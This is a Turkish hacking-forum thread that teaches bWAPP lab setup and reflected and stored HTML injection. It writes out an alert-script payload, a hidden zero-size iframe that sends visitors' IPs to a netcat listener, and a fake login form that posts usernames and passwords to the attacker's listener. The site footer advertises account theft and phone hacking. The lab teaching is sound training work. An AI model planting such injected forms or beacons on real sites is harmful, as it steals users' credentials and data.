Kullanıcıların Dikkatine!

Konularda yapılan kısaltmalı ve geçiştirilmiş mesajlar (adsadas, haha, sjsksjsdjks, asdsd, nokta, random, sayı vb.) yasaklanma sebebidir. Mağduriyet yaşanmaması için bu duruma dikkat etmelisiniz.

Daha Fazlası

Hacktivizm Online

Hacktivizm sitesi hack kültürünü benimsemiş kişiler tarafından 2020 yılında kuruldu. Kuruluş amacı Türkiye'nin en büyük hack forumu olmak ve bilgi alışverişinde bulunmaktır.

Daha Fazlası

Konu Açarken Dikkat Edilmesi Gerekenler

Forumda oluşan / oluşması öngörülen görüntü kirliliğine engel olmak ve başlıkların daha temiz dil ile açılması amacıyla kurallarımıza bazı bağımlı / bağımsız maddeler eklemek durumundayız.

Daha Fazlası

Labler Üzerinde Çalışmalar

Tepegöz

Elmas
Katılım
21 Mayıs 2021
Mesajlar
418
Tepkime puanı
2,000
Konum
İnternet
İlgi Alanlarınız
Siber Güvenlik
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile labler üzerinde çalışacağız.
Metasploitable2,bwapp,juice shop belki ek olarak web for pentester üzerinde çalışmalar yapacağız.
Bu konu çok uzun olacak belki 1 yada 1 buçuk ay civarı süreceğini düşünüyorum bu konu altında devam edeceğiz.

İçerisinde burp suite,sqlmap,dotdotpwn,metasploit,msfvenom,netcat,skipfish,za proxy gibi araçların kullanımlarıda olacak tabi çok detaylı değil. (Detaylı olarak sonra forumda açarım)

İlk yazıyı yarın öğleden sonra yazmayı düşünüyorum.

Son olarak @Tosun abi birşey soracağım bu konunun altında devam edeceğimya her yanıta hide alsam tek bir cevap ve beğeni ile bütün hideler açılıyormu ?

Saygılarımla...
 

RedEnergy

Altın Üye
Katılım
31 Mart 2021
Mesajlar
647
Tepkime puanı
1,143
İlgi Alanlarınız
Sosyal medya uzmanlığı,Webtasarım
Cinsiyet
  1. Erkek
Eline sağlık
 

Tepegöz

Elmas
Katılım
21 Mayıs 2021
Mesajlar
418
Tepkime puanı
2,000
Konum
İnternet
İlgi Alanlarınız
Siber Güvenlik
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile ilk yazımızı yazacağız bwapp kurulumunu anlatacağım.

Bu konudan hemen sonra diğer yazımızı yazacağız...

VmWare için anlatacağım virtual box kullananlar internette virtual box için araştırabilirim

Şimdi ilk olarak bu verdiğim linke gidiyorsunuz ve alt taraftaki fotoğrafta işaretlediğim yere basıp dosyamızı indiriyoruz.

https://sourceforge.net/projects/bwapp/files/bee-box/


Ekran-Alintisi.png


Sonra VmWare açıyoruz ve open virtual machine diyoruz.

Ekran-Alintisi2.png


Tabi bende Bwapp var daha önceden kurmuştum.

Sonra indirdiğimiz zip klasörünü zipten çıkarıyoruz ve çıkardığımız klasörün içindeki .vmx dosyasını seçiyoruz.

Ekran-Alintisi3.png


Sonra ana sayfaya gelecektir üstüne sadece 1 kere tıklayın sakın 2 kere tıklamayın makinayı açarsınız !

Ekran-Alintisi4.png


Sonra sağ alt taraftan edit virtual machine diyorsunuz.

Ekran-Alintisi5.png


Ram sizde 2 gb olarak gelecektir siz bunu 1 gb yapın eğer pc özellikleriniz iyi ise 2 gb kalabilir.

Ekran-Alintisi6.png


Sonra network adapter kısmına gelip bridge mode olarak seçiyoruz.

Ekran-Alintisi7.png


Makinayı açtıktan sonra sizi masaüstü karşılıcak üst taraftan terminali açın ve ifconfig yazın tabi türkçe klavye değil makina setxkbmap tr yazarak türkçe yapabilirsiniz.

Ekran-Alintisi8.png


İp adresi ile gidip web tarayıcınızda bwapp'i açabilirsiniz.

Saygılarımla.....
 

Tepegöz

Elmas
Katılım
21 Mayıs 2021
Mesajlar
418
Tepkime puanı
2,000
Konum
İnternet
İlgi Alanlarınız
Siber Güvenlik
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile html injection'u ele alacağız.

Html injection'u 2 bölüme ayırabiliriz reflected ve stored.

Peki reflected ve stored ne demek ?


Reflected sadece anlık bir komut çalıştırır yani sitede bir değişiklik yapmaz sadece biz görebiliriz yani biz linki eğer başka bir kullanıcıya gönderirsek tıklarsa görebilir.

Stored ise sitede kalıcı bir değişiklik yapar, yani bizim değişiklik yaptığımız sayfayı herkes görebilir.

Reflected Html İnjection

Html injectionda ileride görücez aynı xss'de nasıl javascript ve html kodları çalıştırabiliyorsak html injectionda da html kodları çalıştırabiliyoruz.

Şimdik bwapp'ı açıyoruz bizden şifre isteyecektir bee/bug olarak giriş yapıyoruz.

Ekran-Alintisi11.png


Sonra sağ üst taraftan "Html İnjection - Reflected (Get)" seçeneğini seçiyoruz.

Ekran-Alintisi12.png


Fotoğrafta gördüğünüz gibi bizi ad ve soy ad girme bölümü karşılıyor adımızı soyadımızı girelim.

Ekran-Alintisi13.png


Gördüğünüz gibi bize bir hoşgeldin mesajı yazdırdı.

Tamam peki burda html injection nasıl tespit edeceğiz.

Şöyle Ad veyahut soy ad kısmını html'de var olan h1 yani heading tagları içerisinde yazacağız.

Ad kısmına : <h1>Tepe</h1>

Yazdım.

Ekran-Alintisi14.png


Üst tarafta gördüğünüz gibi Tepe'yi büyük yazdırdı.

Tamam burda html injection tespit ettik güzel.

O zaman google'da araştırma yapalım google'a "html injection cheat sheet" diye aratalım.

Ekran-Alintisi15.png


Github sayfasına girelim....

Ekran-Alintisi16.png


Üst taraftaki fotoğraf'a baktığımızda html ile javascript'i birleştirerek güzel bir payload çıkarmışlar ortaya.

Payload: <h1>Hello,<script>alert(1)</script></h1>

Şimdi bu payload'ı ad kısmına yazalım.

Ekran-Alintisi17.png


Üsteki fotoğrafta gördüğünüz gibi hem uyarı aldık ve tamam dediğimizde hello kısmını büyük yazdırdı:

Ekran-Alintisi18.png


Şimdi ise stored html injection'a bakalım.

Stored Html İnjection

Bwapp'da "Html İnjection - Stored (Blog)" seçelim.

Ekran-Alintisi19.png


Bizi böyle bir yorum yapma yeri karşılıyor.

Örneğin tekrardan <h1>Hello</h1> yazalım tekrardan:

Ekran-Alintisi20.png


Gördüğünüz gibi helloyu büyük yazdı birde şimdi resim çağıralım dışardan.

Bu kodu yazacağız: <iframe src="https://hacktivizm.org/ST0MIp.png"</iframe>

Ekran-Alintisi21.png


Gördüğünüz gibi hacktivizm logosunu gösterdi...

Şimdi olayları biraz daha tehlikeli hale getirelim..

Bizim kali linux'da netcat dediğimiz bir araç var bu araç istekleri yakalamaya yarayan bir araç kısaca.

Şimdi şöyle bir kod yazalım.

Kod:
nc -nlvp 2020

Bu kod ip adresimize 2020. port üzerinden gelecek her isteği yakalayıp bize gösterecek.

Ekran-Alintisi22.png


Sonra birde ifconfig yazarak local ip adresimize bakalım.

Ekran-Alintisi23.png


Local ip adresimizide öğrendik şöyle bir kod yazacağız.

Kod:
<iframe src="http://192.168.1.109:2020/test" height="0" width="0"></iframe>

Kodun anlamı şöyle 192.168.1.109'un 2020.porttan test sayfasına istek atıyor gibi oluyor.

height ve width değerlerinin 0 olmasının sebebi birşey gözükmesin kurban çakmasın diye.

Kodu yorum olarak yazıyorum...

Ekran-Alintisi24.png


Submit dediğimde netcat'e bir bağlantı düştü:
Ekran-Alintisi25.png


Fotoğrafa baktığımızda ip adresinide görüyoruz tabi local ağda olduğumuz için local ip adresimiz geliyor şuan yorum yaptığımız sayfaya giren herkesin ip adresi buraya düşecek hangi site sahibi ziyaretçilerin ip adreslerinin çalınmasını isterki.

Ekran-Alintisi26.png


Üstteki fotoğrafta gördüğünüz gibi width ve height değerli 0 yaptığımız için hiç birşey gözükmüyor.

Şimdi bir örnek daha yapalım.

Tekrardan netcat dinlemesi başlatalım.

Sonra şöyle bir login kodu yazalım:

HTML:
<form name="login" action="http://192.168.1.109:2020/test.html">

    <input type="text" name="username" placeholder="Username">
    <br> <br>
    <input type="password" name="password" placeholder="password">
    <br> <br>
    <input type="submit" name="login" value="Login">

</form>

Tabi action kısmına ip adresini ve dinleme yaptığınız portu yazın ve ek olarak /test.html kısmı veriler sanki test.html dosyasına gidiyormuş gibi göstermek için.

Ekran-Alintisi27.png


Üstteki fotoğrafta gördüğünüz gibi bir login alanı oluştu buraya kullanıcı adı ve şifremizi girdiğimiz zaman netcat'e bağlantı düşecektir.

Ekran-Alintis28i.png


Gördüğünüz gibi kullanıcı adı ve şifre düşmüş oldu.

Evet konu bu kadar idi stores html injection'un ne kadar tehlikeli olduğunu gördük. Aslında reflected'da tehlikeli olabilir sonuçta bir payload sayesinde javascript çalıştırabiliyoruz ilerde beef dediğimiz bir konu göreceğiz neden böyle dediğimi o zaman daha iyi anlayacaksınız.

Saygılarımla...
 
Katılım
30 Mart 2021
Mesajlar
1,239
Tepkime puanı
10,384
Konum
Ubuntu
İlgi Alanlarınız
Klavye ve fare
Cinsiyet
  1. Erkek
Tepegöz ayrı ayrı açsaydın ya kankam ;)
 
Katılım
30 Mart 2021
Mesajlar
1,239
Tepkime puanı
10,384
Konum
Ubuntu
İlgi Alanlarınız
Klavye ve fare
Cinsiyet
  1. Erkek
Eline Sağlıq :)
 
Katılım
30 Mart 2021
Mesajlar
1,239
Tepkime puanı
10,384
Konum
Ubuntu
İlgi Alanlarınız
Klavye ve fare
Cinsiyet
  1. Erkek
Konunun içeriği 70-75 yazı olacağından hem takibi kolay olsun hemde forum kirliliği olmasın dedim. :)
Labler Üzerinde çalışmalar bölüm 2 gibi de yapabilirsin mesela tosunla konuş bi öyle daha güzel olur :)
 

RootAkıncı

Kahraman
Elmas
Katılım
19 Mayıs 2021
Mesajlar
995
Tepkime puanı
11,905
Konum
Ankara
İlgi Alanlarınız
Web Deface.
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile ilk yazımızı yazacağız bwapp kurulumunu anlatacağım.

Bu konudan hemen sonra diğer yazımızı yazacağız...

VmWare için anlatacağım virtual box kullananlar internette virtual box için araştırabilirim

Şimdi ilk olarak bu verdiğim linke gidiyorsunuz ve alt taraftaki fotoğrafta işaretlediğim yere basıp dosyamızı indiriyoruz.

https://sourceforge.net/projects/bwapp/files/bee-box/


Ekran-Alintisi.png


Sonra VmWare açıyoruz ve open virtual machine diyoruz.

Ekran-Alintisi2.png


Tabi bende Bwapp var daha önceden kurmuştum.

Sonra indirdiğimiz zip klasörünü zipten çıkarıyoruz ve çıkardığımız klasörün içindeki .vmx dosyasını seçiyoruz.

Ekran-Alintisi3.png


Sonra ana sayfaya gelecektir üstüne sadece 1 kere tıklayın sakın 2 kere tıklamayın makinayı açarsınız !

Ekran-Alintisi4.png


Sonra sağ alt taraftan edit virtual machine diyorsunuz.

Ekran-Alintisi5.png


Ram sizde 2 gb olarak gelecektir siz bunu 1 gb yapın eğer pc özellikleriniz iyi ise 2 gb kalabilir.

Ekran-Alintisi6.png


Sonra network adapter kısmına gelip bridge mode olarak seçiyoruz.

Ekran-Alintisi7.png


Makinayı açtıktan sonra sizi masaüstü karşılıcak üst taraftan terminali açın ve ifconfig yazın tabi türkçe klavye değil makina setxkbmap tr yazarak türkçe yapabilirsiniz.

Ekran-Alintisi8.png


İp adresi ile gidip web tarayıcınızda bwapp'i açabilirsiniz.

Saygılarımla.....dostum kral adamsın eline sağlık tavsiyem yazılarına hide koy ;)

Merhabalar
Bu konuda sizler ile ilk yazımızı yazacağız bwapp kurulumunu anlatacağım.

Bu konudan hemen sonra diğer yazımızı yazacağız...

VmWare için anlatacağım virtual box kullananlar internette virtual box için araştırabilirim

Şimdi ilk olarak bu verdiğim linke gidiyorsunuz ve alt taraftaki fotoğrafta işaretlediğim yere basıp dosyamızı indiriyoruz.

https://sourceforge.net/projects/bwapp/files/bee-box/


Ekran-Alintisi.png


Sonra VmWare açıyoruz ve open virtual machine diyoruz.

Ekran-Alintisi2.png


Tabi bende Bwapp var daha önceden kurmuştum.

Sonra indirdiğimiz zip klasörünü zipten çıkarıyoruz ve çıkardığımız klasörün içindeki .vmx dosyasını seçiyoruz.

Ekran-Alintisi3.png


Sonra ana sayfaya gelecektir üstüne sadece 1 kere tıklayın sakın 2 kere tıklamayın makinayı açarsınız !

Ekran-Alintisi4.png


Sonra sağ alt taraftan edit virtual machine diyorsunuz.

Ekran-Alintisi5.png


Ram sizde 2 gb olarak gelecektir siz bunu 1 gb yapın eğer pc özellikleriniz iyi ise 2 gb kalabilir.

Ekran-Alintisi6.png


Sonra network adapter kısmına gelip bridge mode olarak seçiyoruz.

Ekran-Alintisi7.png


Makinayı açtıktan sonra sizi masaüstü karşılıcak üst taraftan terminali açın ve ifconfig yazın tabi türkçe klavye değil makina setxkbmap tr yazarak türkçe yapabilirsiniz.

Ekran-Alintisi8.png


İp adresi ile gidip web tarayıcınızda bwapp'i açabilirsiniz.

Saygılarımla.....
dostum kralsın eline sağlık tavsiyem yazılarına hide koy
giphy.gif
 

stowk3r

Altın Üye
Katılım
10 Nisan 2021
Mesajlar
441
Tepkime puanı
3,150
Konum
7/24 ATM BAŞI
İlgi Alanlarınız
Phishing & Spamming
Profesyonel Belgeler
Call Center
Gizlilik ve Güvenlik
Sosyal Mühendislik
Casus Yazılımlar
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile labler üzerinde çalışacağız.
Metasploitable2,bwapp,juice shop belki ek olarak web for pentester üzerinde çalışmalar yapacağız.
Bu konu çok uzun olacak belki 1 yada 1 buçuk ay civarı süreceğini düşünüyorum bu konu altında devam edeceğiz.

İçerisinde burp suite,sqlmap,dotdotpwn,metasploit,msfvenom,netcat,skipfish,za proxy gibi araçların kullanımlarıda olacak tabi çok detaylı değil. (Detaylı olarak sonra forumda açarım)

İlk yazıyı yarın öğleden sonra yazmayı düşünüyorum.

Son olarak @Tosun abi birşey soracağım bu konunun altında devam edeceğimya her yanıta hide alsam tek bir cevap ve beğeni ile bütün hideler açılıyormu ?

Saygılarımla...
ELİNE SAĞLIK DOSTUM
 

ghostkurts

Uzman Üye
Katılım
12 Mayıs 2021
Mesajlar
236
Tepkime puanı
3,445
İlgi Alanlarınız
Acı
Cinsiyet
  1. Erkek
Merhabalar
Bu konuda sizler ile labler üzerinde çalışacağız.
Metasploitable2,bwapp,juice shop belki ek olarak web for pentester üzerinde çalışmalar yapacağız.
Bu konu çok uzun olacak belki 1 yada 1 buçuk ay civarı süreceğini düşünüyorum bu konu altında devam edeceğiz.

İçerisinde burp suite,sqlmap,dotdotpwn,metasploit,msfvenom,netcat,skipfish,za proxy gibi araçların kullanımlarıda olacak tabi çok detaylı değil. (Detaylı olarak sonra forumda açarım)

İlk yazıyı yarın öğleden sonra yazmayı düşünüyorum.

Son olarak @Tosun abi birşey soracağım bu konunun altında devam edeceğimya her yanıta hide alsam tek bir cevap ve beğeni ile bütün hideler açılıyormu ?

Saygılarımla...
e.s
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst